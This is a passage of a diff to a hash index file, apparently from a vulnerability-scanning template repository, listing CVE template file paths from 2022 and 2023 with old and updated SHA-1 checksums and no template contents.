+http/cves/2022/CVE-2022-47002.yaml:b5f20044e9621860a3efb0b32d3856a1934827ad http/cves/2022/CVE-2022-47003.yaml:39b0dcdde25452144702c74bddbf9842ef9c2feb -http/cves/2022/CVE-2022-47075.yaml:d80b880397e3696776237e92a487935e67cf886d +http/cves/2022/CVE-2022-47075.yaml:c1678eb8b857134451836ce2b5f593dd7c05aff4 http/cves/2022/CVE-2022-47501.yaml:5a057cde27d1558e1cf82a1363829f1b07e1e7d0 -http/cves/2022/CVE-2022-47615.yaml:bbe2e07ae5dbd832c2cc65b2f7ca36c030f52b33 -http/cves/2022/CVE-2022-47945.yaml:97169532b2b8b7571b95916c57424e72d7065998 -http/cves/2022/CVE-2022-47966.yaml:af1bb2fa2710b224c472e2a1b5af3838962c2728 -http/cves/2022/CVE-2022-47986.yaml:8ed22d99ee409641cd4ad6ac5f9c82611f723b00 -http/cves/2022/CVE-2022-48012.yaml:8ad3d951e84b4e917c805d17a978e04c6bd31cf8 -http/cves/2022/CVE-2022-48165.yaml:5b832f9fb849f7aadcb963a5c2fa8c87bf309497 -http/cves/2022/CVE-2022-48197.yaml:5698e9353865370a7b92e512b093b974453ff937 -http/cves/2022/CVE-2022-4897.yaml:53f0aba534dc50ab3f73fe45b077340a0f6f791b -http/cves/2023/CVE-2023-0099.yaml:e09f47a4940ff99c8bd70fe410b21e86584deaa7 -http/cves/2023/CVE-2023-0126.yaml:a54e76067a42d920676305e72882b5cb8d6db686 -http/cves/2023/CVE-2023-0159.yaml:06dfde67e7960bf7adf9597508141fdfac598393 -http/cves/2023/CVE-2023-0236.yaml:5fbf81b6152e933910d34f140cede20a70339f8c +http/cves/2022/CVE-2022-47615.yaml:5fd9679a2f05799098398f1c4744f03efbc98406 +http/cves/2022/CVE-2022-47945.yaml:fc6bf1988ae81ba0b7aab2866fbf36092527fb1d +http/cves/2022/CVE-2022-47966.yaml:b4f745ff224a0c1005e847548490607ccab51ae7 +http/cves/2022/CVE-2022-47986.yaml:2a8f07ea60a04d4e8917666f9f8229dc8e668b6b +http/cves/2022/CVE-2022-48012.yaml:468945001c2fda706f19335ba0fccdd41254845f +http/cves/2022/CVE-2022-48165.yaml:0d30e08a304606adecb631a940f674bfa06f8b46 +http/cves/2022/CVE-2022-48197.yaml:fcdf74df464deab4276806b2fd1d8d11e7849c36 +http/cves/2022/CVE-2022-4897.yaml:92f778ba997e0d796420c1236682069f0b0f9779 +http/cves/2023/CVE-2023-0099.yaml:cdfed327c29ff370e6b06c37aa366dab18e1165f +http/cves/2023/CVE-2023-0126.yaml:6622dccea76462d0952ff1db6e35da809393d97a +http/cves/2023/CVE-2023-0159.yaml:dad65813c9a2a5d95fefa066072e4dcb30a33414 +http/cves/2023/CVE-2023-0236.yaml:59baf08b76758762d47f413d236485cf5b319dce http/cves/2023/CVE-2023-0261.yaml:5087fa9d04efc600b41de02fcac82bda2bcf0595 -http/cves/2023/CVE-2023-0297.yaml:e7baf32f9942f688924d9a162dc7551de98dde89 -http/cves/2023/CVE-2023-0334.yaml:adafbaa999b2d81291647630f256534cf89e1964 -http/cves/2023/CVE-2023-0448.yaml:b1ef2c2f82671bf7768df19ac61414b49a800956 -http/cves/2023/CVE-2023-0514.yaml:cddeb96f132ed763163b122c5fd44456704ddf57 -http/cves/2023/CVE-2023-0527.yaml:0e9801c97087f3aa24b6257d56e6772b0e693c59 -http/cves/2023/CVE-2023-0552.yaml:0760deedf488e135c767704cd7e9ba47452832b5 -http/cves/2023/CVE-2023-0562.yaml:dedbac0108d92c16a716dfee990455027942e09f +http/cves/2023/CVE-2023-0297.yaml:ace64d1b8ef97f2466a2718a5d62fd9bc3363962 +http/cves/2023/CVE-2023-0334.yaml:e64c269ae26b3ae9cc1018c96b7c988d1ce7d16b +http/cves/2023/CVE-2023-0448.yaml:602dc4fb8805fa78abee06c6aaea0e867a814943 +http/cves/2023/CVE-2023-0514.yaml:b76094833ad8697323609f0e18538edda46b4526 +http/cves/2023/CVE-2023-0527.yaml:e2ce6556221604eb1a240ee35fe9b2ffc3bbdea5 +http/cves/2023/CVE-2023-0552.yaml:5ee8de972f89dc61566d00978c7365a55f9df39e +http/cves/2023/CVE-2023-0562.yaml:86e35de0ffd83e90947e7c4b0b49836230bde3bc http/cves/2023/CVE-2023-0563.yaml:5826a789671414b74d945727d46e2868a0030eb9 -http/cves/2023/CVE-2023-0600.yaml:09edb6a74e6c8b298542d990288279230e8755b8 -http/cves/2023/CVE-2023-0602.yaml:ff8508c23cf1205eacdf532b97243ed38c44192a -http/cves/2023/CVE-2023-0630.yaml:79c8dee6873225aaf9f80e29a2fe2ecd54b0cadc -http/cves/2023/CVE-2023-0669.yaml:6d285a26e93cfa32c6caa2c5836644273e50c8a6 -http/cves/2023/CVE-2023-0678.yaml:63b5b4ff9f86d447ef93ab3ef1459090de165b88 +http/cves/2023/CVE-2023-0600.yaml:fcfb1a40a3cd2e7df90c774102fd125bd335b405 +http/cves/2023/CVE-2023-0602.yaml:e31c5d2abf85c2ee480612417a8d6a784ea0c190 +http/cves/2023/CVE-2023-0630.yaml:3e345bf8bc629f39a8cd585c837348d7600981bf +http/cves/2023/CVE-2023-0669.yaml:b6c8c235c98d2f2bf23b28b62006591fcf62aabf +http/cves/2023/CVE-2023-0678.yaml:8c8f0e339ac17af3d2efac4b3ec82cdbbb279bb6 http/cves/2023/CVE-2023-0777.yaml:695dc3b34a41b2d46cabcb2c40a57b3fe284f036 -http/cves/2023/CVE-2023-0900.yaml:b759bab8d921f6f87047fe65b1a8270a25ac6c78 -http/cves/2023/CVE-2023-0942.yaml:727aa39921928b56f641bda22efa7bc0ceaa8b2a -http/cves/2023/CVE-2023-0947.yaml:99ec36b3fb58ac77cdb7da8e784120ca7d58bd3b -http/cves/2023/CVE-2023-0948.yaml:0367e3cf81b12e51330d0b1ab2d09761172a554d -http/cves/2023/CVE-2023-0968.yaml:ae1e19b9b10293fe400ba1410af6e61fe97fcb12 -http/cves/2023/CVE-2023-1020.yaml:5636fe07aa03fa9f3a0b33826c8f8f7a690f7925 -http/cves/2023/CVE-2023-1080.yaml:bcb835fba141a11986b02014068b75190537899c -http/cves/2023/CVE-2023-1177.yaml:f14c03311e38c1d9faebb9a86ee2723b3f417f87 -http/cves/2023/CVE-2023-1263.yaml:04b6a372edaa449d9f7d09dde92c7f53f70718e8 -http/cves/2023/CVE-2023-1362.yaml:cdee456e5b9cf88406cf478d4f9c519dc7ba89df -http/cves/2023/CVE-2023-1408.yaml:dc5282fda3dc97da2b9c2be50065535af09f6fc9 +http/cves/2023/CVE-2023-0900.yaml:cbef37de88d0b61540d3d8b63c80c09960b6c21e +http/cves/2023/CVE-2023-0942.yaml:fcb0811220da813890a775f5c00e2f91cf2c340b +http/cves/2023/CVE-2023-0947.yaml:2d43c3e9a69df1ec17476ed2b0895fe38ede4d06 +http/cves/2023/CVE-2023-0948.yaml:c0b92cf821b6f4b80dd5135d77ad852a8049a9bb +http/cves/2023/CVE-2023-0968.yaml:0f3618d7652e69aaba867716e2bdf1217430566c +http/cves/2023/CVE-2023-1020.yaml:62fc61d24e0e1681b1bf64d37033caecf096364a +http/cves/2023/CVE-2023-1080.yaml:57fd2d5ede5e09e53ef5c560add050d334ba9b09 +http/cves/2023/CVE-2023-1177.yaml:3f5f39078e73040951a342c72dd0417a62d0637f +http/cves/2023/CVE-2023-1263.yaml:954755ea23eaab8dbf35c5b53d78ae5642ac7c11 +http/cves/2023/CVE-2023-1362.yaml:6e432a7601e15e3e50f24c19ef101f6395404113 +http/cves/2023/CVE-2023-1408.yaml:2c3e73f4296c1f9606b8e377436ebdbfe1f715e2 http/cves/2023/CVE-2023-1434.yaml:35cc7af9bfe87b4a88a973a22dae4cc94a23bd97 -http/cves/2023/CVE-2023-1454.yaml:f507915aeffd9373633f9903f3f42fd148ae631f -http/cves/2023/CVE-2023-1496.yaml:07cd1dcd0767b93ad10044260e11e4cbb12875ac -http/cves/2023/CVE-2023-1546.yaml:e1ce7e4455e8d70f81d039868cfa7c05e9b7950c -http/cves/2023/CVE-2023-1671.yaml:681f98443bbfc4892fc531bf522cf922ba80f813 -http/cves/2023/CVE-2023-1698.yaml:e945233b316cdedba4ca8e9d7b5fc33755f55d26 -http/cves/2023/CVE-2023-1719.yaml:7837cfc713541d4998a43dd94e445eedf1583e70 -http/cves/2023/CVE-2023-1730.yaml:0ac62ee0d8e280f74152e8189f92a7dcbd1a0d04 -http/cves/2023/CVE-2023-1780.yaml:a13c9a4883fbae14fc1fdfaffb1e1b0d942a6338 -http/cves/2023/CVE-2023-1835.yaml:10fd479ca3a5aa355acbca9f948ac5cfc84174b3 -http/cves/2023/CVE-2023-1880.yaml:6d83ee09fbe4910f81808b87ef627188221ff428 -http/cves/2023/CVE-2023-1890.yaml:8cbb29b8a367580d3c3df12f01b6f44096964487 -http/cves/2023/CVE-2023-1892.yaml:b427a93cbc382d7f03e99c1a52d0179c76b83cc2 -http/cves/2023/CVE-2023-20073.yaml:32602a37f6dedce15b6c14cfc174e3ab4a412b75 -http/cves/2023/CVE-2023-2009.yaml:0e458c2616c9e35744adb4e65737b8801f074695 +http/cves/2023/CVE-2023-1454.yaml:e0b6ba7bc52ecb2e58d67b61ca3ef3010851a0fc +http/cves/2023/CVE-2023-1496.yaml:985b6d064c077e56a9214edaa14905cde2aeae6e +http/cves/2023/CVE-2023-1546.yaml:8c8e4f20d034c05c48d5cdd431661c5b40ef7860 +http/cves/2023/CVE-2023-1671.yaml:997286cbd7021b668c2f6510ac971fcb46b86925 +http/cves/2023/CVE-2023-1698.yaml:6fef0e18d2d0772e0781dba7a71d4d002ec40300 +http/cves/2023/CVE-2023-1719.yaml:fbe0a29e87d24ce8d3bfc97713e592b06c2de057 +http/cves/2023/CVE-2023-1730.yaml:db103227ee8d88ba94638a6b952356057f095ae2 +http/cves/2023/CVE-2023-1780.yaml:621e1a9e470723487065088b68c3da0d8b403231 +http/cves/2023/CVE-2023-1835.yaml:ba80a61d4cc2d0c561efb5994071542c2a59a500 +http/cves/2023/CVE-2023-1880.yaml:00d09d7b221180a15759e6629e3279c98cd53ea5 +http/cves/2023/CVE-2023-1890.yaml:3330b642e76c981f041c0275e19aa44d0f3b8bd2 +http/cves/2023/CVE-2023-1892.yaml:0628d24acbfbbd6a5079d77de9455bf90f0e091c +http/cves/2023/CVE-2023-20073.yaml:94402e66e673901266d834d82e411b71933190ef +http/cves/2023/CVE-2023-2009.yaml:6680fb1da94a211cbb09a77d3b19a9b4165dc8a1 http/cves/2023/CVE-2023-20198.yaml:a51d3f58209d7ee5a28087839f7bfe0ba70173c7 -http/cves/2023/CVE-2023-2023.yaml:6711a89e6918606b2dd7d47c76153e28261094b0 -http/cves/2023/CVE-2023-2059.yaml:d90234f615f76231d2e24221befc70aed4a1a8c9 -http/cves/2023/CVE-2023-20864.yaml:22050ddba9d20317baad72a08ded7974446dea6e -http/cves/2023/CVE-2023-20887.yaml:b1b143618d3396f595f72022fa53239a8b069a5e -http/cves/2023/CVE-2023-20888.yaml:efa8475387c2ab727684b086e65cb5d292a2a73a -http/cves/2023/CVE-2023-20889.yaml:16a60a2c49b7b52e149c9a108e3ed9d814607501 -http/cves/2023/CVE-2023-2122.yaml:46ca5a614d4044ae9ef00b08846d515fc92af1a6 -http/cves/2023/CVE-2023-2130.yaml:09284dfc7455d0803979c640213c48b540b0320a -http/cves/2023/CVE-2023-2178.yaml:9d030e9e9e685cff2820ffcda48385c1f1c3ed02 -http/cves/2023/CVE-2023-22232.yaml:405eae8487cd087f14eb89f375ee2ad4fdb39fef -http/cves/2023/CVE-2023-2224.yaml:ccf9b19f8648317b36a26d95da4e7ff5eaa2a076 -http/cves/2023/CVE-2023-2227.yaml:a543fd2374500619eabd60a33e9c3505301f3e9c -http/cves/2023/CVE-2023-22432.yaml:24909cb5a915d9380fa96d050b24d80d1a6f7348 -http/cves/2023/CVE-2023-22463.yaml:cc556e03212aad829d648982872bc5faf1736d6e -http/cves/2023/CVE-2023-22478.yaml:ef6e66eb6d47a4d69eaf216b2c1efd78ce62c36d -http/cves/2023/CVE-2023-22480.yaml:73ce7854345335bda42d333c7c0ff06814ff0aed -http/cves/2023/CVE-2023-22515.yaml:739c18a0ae5877afcec00abdb56fe6903cac125e -http/cves/2023/CVE-2023-22518.yaml:43089328e1ed1386683d74f8483b06a55767f8cd -http/cves/2023/CVE-2023-2252.yaml:6bdd5a55d3be400de7f3aa5b04a1e0cde7fc1d3e -http/cves/2023/CVE-2023-22527.yaml:c53d2a4bba640a999631b07b9cea85b371f4cb45 -http/cves/2023/CVE-2023-22620.yaml:b41d8e2aca1d8f11f7ef58bddaab7c900ef27175 -http/cves/2023/CVE-2023-2272.yaml:75fb822252ec07ce5f8c8234d5c99dbc214a5a8a -http/cves/2023/CVE-2023-22897.yaml:1dc50bc03e62695bf9930998ac50d1e8532031ca -http/cves/2023/CVE-2023-23161.yaml:330962071a2da439c6f4ad2cfd9399673b3c3748 -http/cves/2023/CVE-2023-23333.yaml:c82c96716e574b2ac6f5243a42561e6b661697d7 -http/cves/2023/CVE-2023-23488.yaml:cce2f22d82bdbb32512be4899c8956b8a98469b3 -http/cves/2023/CVE-2023-23489.yaml:e2f4be81d387be5eb2856fe6218282fee51428fb -http/cves/2023/CVE-2023-23491.yaml:7432abe66255565410e775aed3599fe72f64babf -http/cves/2023/CVE-2023-23492.yaml:9412ada1002d29956c069b2d1ed3fa39ebf9d4ca -http/cves/2023/CVE-2023-2356.yaml:afcfcb280eaa73e7841563176920159586de1c48 -http/cves/2023/CVE-2023-23752.yaml:855cd21aad48643be8adce80ee4a57b3cfaeb3e3 -http/cves/2023/CVE-2023-24044.yaml:b1fcbf242f8611b3d7429bbc30319b6a1cfded2e -http/cves/2023/CVE-2023-24243.yaml:5d77029d1e00451d81039ca3c90ea6df376e07b5 -http/cves/2023/CVE-2023-24278.yaml:1923ae74c574d89888f1c0724a3c6a58afe4d460 -http/cves/2023/CVE-2023-24322.yaml:08bc0c874464a6fc3abc02de139fe9083c41b221 +http/cves/2023/CVE-2023-2023.yaml:226bf02b5318dc6cfebadd23d5aecb21c651e9c2 +http/cves/2023/CVE-2023-2059.yaml:0cca32c1ba98932cbe6b413055becd7affc69b27 +http/cves/2023/CVE-2023-20864.yaml:00440eaddd70c1fa0c48a1382e6d85d69abd7fee +http/cves/2023/CVE-2023-20887.yaml:a8fd31ef3cc60ff2572b0ef5f182862e9a064ede +http/cves/2023/CVE-2023-20888.yaml:f13a7f0b88d50776a333b40a138f82c633d125a0 +http/cves/2023/CVE-2023-20889.yaml:5bfb70330fa3b04f5b0af636c18a2c6a5267ac4b +http/cves/2023/CVE-2023-2122.yaml:7dca84047ac5d644ee1d20ea67b70e4bd36947ed +http/cves/2023/CVE-2023-2130.yaml:314de8c387b9e0bd75dd8a98f0c7283185b83db9 +http/cves/2023/CVE-2023-2178.yaml:3907c43ef047c7398dd6c6075b7eb37f81431e7f +http/cves/2023/CVE-2023-22232.yaml:2ba9592c818ffec5b515fe7b5daa05c39e5c0075 +http/cves/2023/CVE-2023-2224.yaml:e0d9099e5025c8aa7b3e29c3aa6ba735e4be50f2 +http/cves/2023/CVE-2023-2227.yaml:419bd91b84cd26b87741523630753ff62a0f6f56 +http/cves/2023/CVE-2023-22432.yaml:9dbb7e336e8db33be5b66a8eabc22e1b165014b3 +http/cves/2023/CVE-2023-22463.yaml:2d955943e22db088cf96527a0829132e5772b7ca +http/cves/2023/CVE-2023-22478.yaml:60828118fe9d7a7642c22b6ec8e8823c3142587a +http/cves/2023/CVE-2023-22480.yaml:2aa43dfc6c7beaeafaee0862b0c4e72d5f868e92 +http/cves/2023/CVE-2023-22515.yaml:001d637ac8df397f671aefa6c8f939f3d5410c64 +http/cves/2023/CVE-2023-22518.yaml:578d6d85b9a2c589620c071d13415f4dd95195e6 +http/cves/2023/CVE-2023-2252.yaml:540bf478302df8c091ec14e8403a46ac8f8d0933 +http/cves/2023/CVE-2023-22527.yaml:3a3e37278c23e88e83755249211c24b057478d53 +http/cves/2023/CVE-2023-22620.yaml:9a4fb268f6aad7753f3a0d3a2222b5946221ed79 +http/cves/2023/CVE-2023-2272.yaml:94a125ff04e62b2d1bda69787e8fd1019a36be42 +http/cves/2023/CVE-2023-22897.yaml:c46463ab516bb1faf879b0d29483e13138d356fd +http/cves/2023/CVE-2023-23161.yaml:edb754d19bcded64d5d054c11b355f252081d087 +http/cves/2023/CVE-2023-23333.yaml:f04c8f6519d52c53935243fb10dc6cddde95a27b +http/cves/2023/CVE-2023-23488.yaml:4701ba1c43a8888bef0092585a3666bc4e3809b5 +http/cves/2023/CVE-2023-23489.yaml:eb3988e79364bf65b6116f6040271a11ba06908d +http/cves/2023/CVE-2023-23491.yaml:30046ed227b359bae6f8e485f89933d9955612da +http/cves/2023/CVE-2023-23492.yaml:16fa0c1fc4002b952a33b61d3fabc64636ac7f23 +http/cves/2023/CVE-2023-2356.yaml:e48691aae0f032a6a3b25b934d0d1334e88b687a +http/cves/2023/CVE-2023-23752.yaml:c3505ebba983ea2f6c82bf34c77267ce5f8d396f +http/cves/2023/CVE-2023-24044.yaml:f85c5c11a2671b5285303f12ee1e9eb85ada8f3e +http/cves/2023/CVE-2023-24243.yaml:4e42089c2b7118d593f336cea101baec62433654 +http/cves/2023/CVE-2023-24278.yaml:1d2306f9d9cb2d17f8e79ee9cac52005c5a55cfe +http/cves/2023/CVE-2023-24322.yaml:1f16814c9e0527336a70b07183df6a08843dd52b http/cves/2023/CVE-2023-24367.yaml:dab63258fffca6b44d754ede551d56eea925a477 -http/cves/2023/CVE-2023-24488.yaml:d0fb3f9b0de2a277171ee4a98c8bd44aad7d2088 -http/cves/2023/CVE-2023-24489.yaml:88f26dd03607c7a69552055427bc8f70163d01c7 -http/cves/2023/CVE-2023-24657.yaml:748b677675913cd96bb56e2d9f537380735d2312 -http/cves/2023/CVE-2023-24733.yaml:c8b0d43ceccc3991aaa817097347478eafe24452 -http/cves/2023/CVE-2023-24735.yaml:798a0644a6f587cba391e0c4961fb65c23b5be7b -http/cves/2023/CVE-2023-24737.yaml:e908a841783481bb6076502ff80fe24f55cdc07d -http/cves/2023/CVE-2023-2479.yaml:a8d07e5b7b1f67b26ab9b7da395b407731963a68 -http/cves/2023/CVE-2023-25135.yaml:79052c6a9d0f339cf4678dd6f86dcc3d635123c2 -http/cves/2023/CVE-2023-25157.yaml:72d159aa24f1d5619484a3c71ef4dc55b3442d6a -http/cves/2023/CVE-2023-25194.yaml:ac4f9b068ead0939cb0c4594cd0cc167adde15ab -http/cves/2023/CVE-2023-25346.yaml:927dea62b1096bc9bbd1252b7ed33c0896cb5cc1 -http/cves/2023/CVE-2023-25573.yaml:88fd978e3618f24e47f91a04054eb7c4dfd0b6d8 -http/cves/2023/CVE-2023-25717.yaml:da602abf26a0f232d0b1dc69e47cbd6558d75fba -http/cves/2023/CVE-2023-26035.yaml:0bfdc98c4f6e89d83c4a57819408a9414c8878a2 +http/cves/2023/CVE-2023-24488.yaml:314904a4ec11935f014941947359b122da566ba5 +http/cves/2023/CVE-2023-24489.yaml:9301d3ee69b9c3a2b964f0d0c5e59f8fbb341678 +http/cves/2023/CVE-2023-24657.yaml:e039ba8bc471c388352e4a488cadd3681029db7b +http/cves/2023/CVE-2023-24733.yaml:23bda09c6f044b03faec0b6649a1a853990ea0e0 +http/cves/2023/CVE-2023-24735.yaml:67120a500ee09b1505bd4e03931cf3442c6ee5c5 +http/cves/2023/CVE-2023-24737.yaml:a8ed9b45432009c15cef619e5191b47792268153 +http/cves/2023/CVE-2023-2479.yaml:de7d8970759dbc5947842d9f907336885284dc0c +http/cves/2023/CVE-2023-25135.yaml:96794dcb67daf207130181cfe351c88119a48ed4 +http/cves/2023/CVE-2023-25157.yaml:b523eac47864cd034b4340fb12634285ed72e585 +http/cves/2023/CVE-2023-25194.yaml:5b45568dd93d4f8fc9e80c356b3021284f450d11 +http/cves/2023/CVE-2023-25346.yaml:51f024896301035a2c43b2e6e0213631707ed2b6 +http/cves/2023/CVE-2023-25573.yaml:6a121ccc820d7252353568d1ef36e765ea3c35dd +http/cves/2023/CVE-2023-25717.yaml:f3fba62004036acce7eed03adcb3184c64fb17a0 +http/cves/2023/CVE-2023-26035.yaml:4eafd9eb80c5e90c1545e15199cb95e41f451289 http/cves/2023/CVE-2023-26067.yaml:a9b18f2101c4ada25295447e64d845c7fb5c4266 -http/cves/2023/CVE-2023-26255.yaml:f0575f5af6b800ee96420011038c6e88d8553bb9 -http/cves/2023/CVE-2023-26256.yaml:4076934b1cf4dec9d2d68d5bc370d114d4f657ad -http/cves/2023/CVE-2023-26347.yaml:0388c53de52772e2015a0c467dccf94e6e568fa9 -http/cves/2023/CVE-2023-26360.yaml:fd2e3196bb84bd3bd861086b342978b9f7ac5e43 -http/cves/2023/CVE-2023-26469.yaml:73a3992126d3fdb82794695dd93297dc3f0312ff +http/cves/2023/CVE-2023-26255.yaml:ec1d253f10a1b1cb5c8681faf961c83f18e04fc5 +http/cves/2023/CVE-2023-26256.yaml:0ce70d95fae80f6cf144859b5627018a98de7aea +http/cves/2023/CVE-2023-26347.yaml:25df9074e22d8c47311a3458a5f447013045f5aa +http/cves/2023/CVE-2023-26360.yaml:82ffcb37b302392863d25e7cdbd5b9fda0503347 +http/cves/2023/CVE-2023-26469.yaml:d86410be29d5d94487f257b6b8928f6a2414b893 http/cves/2023/CVE-2023-2648.yaml:41ec7f7a05226cc4b5805c7b3018d5d492f21343 -http/cves/2023/CVE-2023-26842.yaml:10cae8b4f3df387b1c4a37df6d7e2aedbf2d4f54 -http/cves/2023/CVE-2023-26843.yaml:13eedeb5f7c849016f32a2f45ba7f173c6b2bdc3 -http/cves/2023/CVE-2023-27008.yaml:09fcde0a313c113f34dafaa28c97666e0283d093 -http/cves/2023/CVE-2023-27032.yaml:d7be4494adad630ba076f9c07c53906d527fb723 -http/cves/2023/CVE-2023-27034.yaml:e97a62db332d16cad3a1cdb7830dfb87e1cef496 -http/cves/2023/CVE-2023-27159.yaml:c90e213d2262b9f193e525df1a7116d821023d2b -http/cves/2023/CVE-2023-27179.yaml:32e83ec871e822179dc7699285fafe32d4356cb8 -http/cves/2023/CVE-2023-27292.yaml:b52dc9ce1aeb127e2ab870ee5356d6ad0b000ca6 -http/cves/2023/CVE-2023-2732.yaml:378ae0f10a3912827d7c15919f8e1a6d0fe2f9ea -http/cves/2023/CVE-2023-27350.yaml:f0dd62057770227455d6cae2d5b30ac35286a438 -http/cves/2023/CVE-2023-27372.yaml:72c58a1d9c3f0ae3e29c7a6705aefea08672217a -http/cves/2023/CVE-2023-27482.yaml:a1f7bfaded3952990e267ace21564c1e7c30a343 -http/cves/2023/CVE-2023-27524.yaml:8b8310c667682faa2e5979cc13a81f073fea7fbd -http/cves/2023/CVE-2023-27587.yaml:60a08e795ba4fba51267211fb6b52965ea1186eb -http/cves/2023/CVE-2023-27639.yaml:ef6e0c1b295a1edd56cf92d1a064ae083f285a3f -http/cves/2023/CVE-2023-27640.yaml:8a848a7e9f380368c06dc6e6b9ad1a709d6bd6f0 -http/cves/2023/CVE-2023-2766.yaml:9ca36e1763589a1d8c809a724ee0cfd23ea295e0 -http/cves/2023/CVE-2023-2779.yaml:eafff3164c677d37a04194bcdc51b533692ee55e -http/cves/2023/CVE-2023-2780.yaml:f72133ca5cf8d976108d6d4b2f907e60cf0199ef -http/cves/2023/CVE-2023-27922.yaml:ba8517cad621418eadabe8601686d65428dd2b7d -http/cves/2023/CVE-2023-2796.yaml:4735c6740dd51b254556735690d36d69426bf740 -http/cves/2023/CVE-2023-28121.yaml:38b48c61d43bfa70415fa970ee25ed4f8ea05fc5 -http/cves/2023/CVE-2023-2813.yaml:14383aa3525cfbbc844f2caff67cda4f6dfc733b -http/cves/2023/CVE-2023-2822.yaml:760308ee5e17848b176d6465ab18679d582be37e -http/cves/2023/CVE-2023-2825.yaml:ae1cd203cc26527280ca32998f788de89e44d260 -http/cves/2023/CVE-2023-28343.yaml:1234c116ca3e732396624b0aac258298782693b1 -http/cves/2023/CVE-2023-28432.yaml:f58e470004f1d630158498724b2f3da592d8e239 -http/cves/2023/CVE-2023-28662.yaml:2abc573c9c427499910d2f2bf8e1df2054b36ffa -http/cves/2023/CVE-2023-28665.yaml:24a723b670bc1b3caf8fd461db06c6bd0d6e777f -http/cves/2023/CVE-2023-29084.yaml:53bb68cddf14ad14c675ea5000aea77e262b85a9 -http/cves/2023/CVE-2023-29298.yaml:108ee89e60348eee5337de28270b459a9b6d026b -http/cves/2023/CVE-2023-29300.yaml:966564784afefc7242bb44896d3fbfe7fe4404ac -http/cves/2023/CVE-2023-29357.yaml:8e303b57335b68a26186d19e776abfad5ecaa2bd -http/cves/2023/CVE-2023-29439.yaml:af7ce0ffcdeb120f84b8b6830db8e9e9e371a2f1 -http/cves/2023/CVE-2023-2948.yaml:7d521c83108d6c531128fd1e74c901a706b1935e -http/cves/2023/CVE-2023-29489.yaml:f60b01457d4b477ee696f93ddb2e30f326199c03 -http/cves/2023/CVE-2023-2949.yaml:bc04bcfa8a442507b21e06302481027378a377de -http/cves/2023/CVE-2023-29622.yaml:2e564b7bda7d640e39fac1933c50864584e35622 -http/cves/2023/CVE-2023-29623.yaml:f15162a4115311b0bc6b8fb6cd695eccd0d24bdf -http/cves/2023/CVE-2023-2982.yaml:45bc262a664404b8ce1c2095d2334b5bb727b2ba -http/cves/2023/CVE-2023-29827.yaml:c15a74c6266ecc649b994d35dcecf59ad32be5e4 -http/cves/2023/CVE-2023-29887.yaml:af9539787a7cf27ecc50593e77d29cd13ce9d5a7 -http/cves/2023/CVE-2023-29919.yaml:5c2c936f07167fa7dbd94388c6cfefca3ba163ec -http/cves/2023/CVE-2023-29922.yaml:2a03061feb29ae93404e8320e7c63333fb58bc09 -http/cves/2023/CVE-2023-29923.yaml:dedb7e0cdac4d0e63c1558d538f5809d61275682 -http/cves/2023/CVE-2023-30013.yaml:ac3c0f858a056ad35b10f220f83aa3f958acb4a7 -http/cves/2023/CVE-2023-30019.yaml:069417784eeeef2c4959a294cf9e0b92d1f45305 -http/cves/2023/CVE-2023-30150.yaml:189b89309f2ab8d59a6ef495c376449e2ac293ac -http/cves/2023/CVE-2023-30210.yaml:0f5dd2db899de17ca8b212e6041bd624873fdbfd -http/cves/2023/CVE-2023-30212.yaml:9163e8ec19a1bf4cfdd0155156bd6ce6f153d82d -http/cves/2023/CVE-2023-30256.yaml:71711039f3cb6107e806ed08d98a5036c84084cb -http/cves/2023/CVE-2023-30258.yaml:07f7ea3461b41bd4da542b84d2b7498ebb399ea0 -http/cves/2023/CVE-2023-30534.yaml:bf7eebcc4d7fa40e9ab8c834575b17f0c33837c9 -http/cves/2023/CVE-2023-30625.yaml:277f7151436a4b50fecc6745ab46954d96c42ff3 -http/cves/2023/CVE-2023-3077.yaml:a503e8b074518b7a630c790c4bcf5096c83dafbc -http/cves/2023/CVE-2023-30777.yaml:db4827dfa54fec6242ce9ea4c772addb723391e8 -http/cves/2023/CVE-2023-30868.yaml:848d6ae085a1d58172cc7cb997ac51d688c3cd21 -http/cves/2023/CVE-2023-30943.yaml:9400ebc63cca40f491a4765089051822f49ab048 -http/cves/2023/CVE-2023-31059.yaml:ed6ed4b07a7aba43ea08d5b1001192a03a96d434 -http/cves/2023/CVE-2023-31446.yaml:2ffab63d38fd32eb0e649311f4e7238a9279a061 -http/cves/2023/CVE-2023-31465.yaml:84b38d7e29d648c19439f6fb1e2b2a94f40a361a -http/cves/2023/CVE-2023-31548.yaml:9b2972a6c1a4ddcbc803f5471758804aa305e539 -http/cves/2023/CVE-2023-32077.yaml:101a39d9204f5baf01f2affa1fb80cc72890b87f +http/cves/2023/CVE-2023-26842.yaml:9ba42ef7713a2da2a394f4d7eb4a128b86fac335 +http/cves/2023/CVE-2023-26843.yaml:8fe63e31bbec18e14832dc356cc39ad9fa68aac6 +http/cves/2023/CVE-2023-27008.yaml:30ef0a8f111c80fd8db02f0bd82d93b872258169 +http/cves/2023/CVE-2023-27032.yaml:3adca243e329c892cace57bc3c2f5de4785e08b9 +http/cves/2023/CVE-2023-27034.yaml:81fe9d019fa4529576ca3e6ce5723d93c9a08b44 +http/cves/2023/CVE-2023-27159.yaml:cbef92bc5ef61d86ddd8f5621ef37267e63b0cef +http/cves/2023/CVE-2023-27179.yaml:ad65cc149fce2fce2602528559e5ce2648f309e9 +http/cves/2023/CVE-2023-27292.yaml:6ec20f4f6de264927313e98584e617126f0af04e +http/cves/2023/CVE-2023-2732.yaml:fa07bf101983336938853b632588f27b19fd22fc +http/cves/2023/CVE-2023-27350.yaml:c81bd993344a9d4601e3a997478858aa9b90fb3b +http/cves/2023/CVE-2023-27372.yaml:842025a8909ee08c65b883599ff19fc202f55233 +http/cves/2023/CVE-2023-27482.yaml:7630dbd6eb208bea08f6417892458c367bcac0f5 +http/cves/2023/CVE-2023-27524.yaml:3070cfdf10ce5df9513d0f746742cb87ae2d1d40 +http/cves/2023/CVE-2023-27587.yaml:fbcf3d35ecfe4f4d8d5bf1bf1ca6a3139fc006f6 +http/cves/2023/CVE-2023-27639.yaml:96c7fb109c3d31579f51e9d141b8558edf581a37 +http/cves/2023/CVE-2023-27640.yaml:afb078a9eea67cd4dc96bbbf79568ed1a9e4535c +http/cves/2023/CVE-2023-2766.yaml:0e16a02cb26f88cc75133220c5e34875d59d7ffe +http/cves/2023/CVE-2023-2779.yaml:8f901cbf94797358ec2e4eae2c6cfdf8955af305 +http/cves/2023/CVE-2023-2780.yaml:a2cee3c0e42a81ca03aa1b0ec5082df2067272b3 +http/cves/2023/CVE-2023-27922.yaml:f1c1540bd8ccf6e832690facd76287109c579359 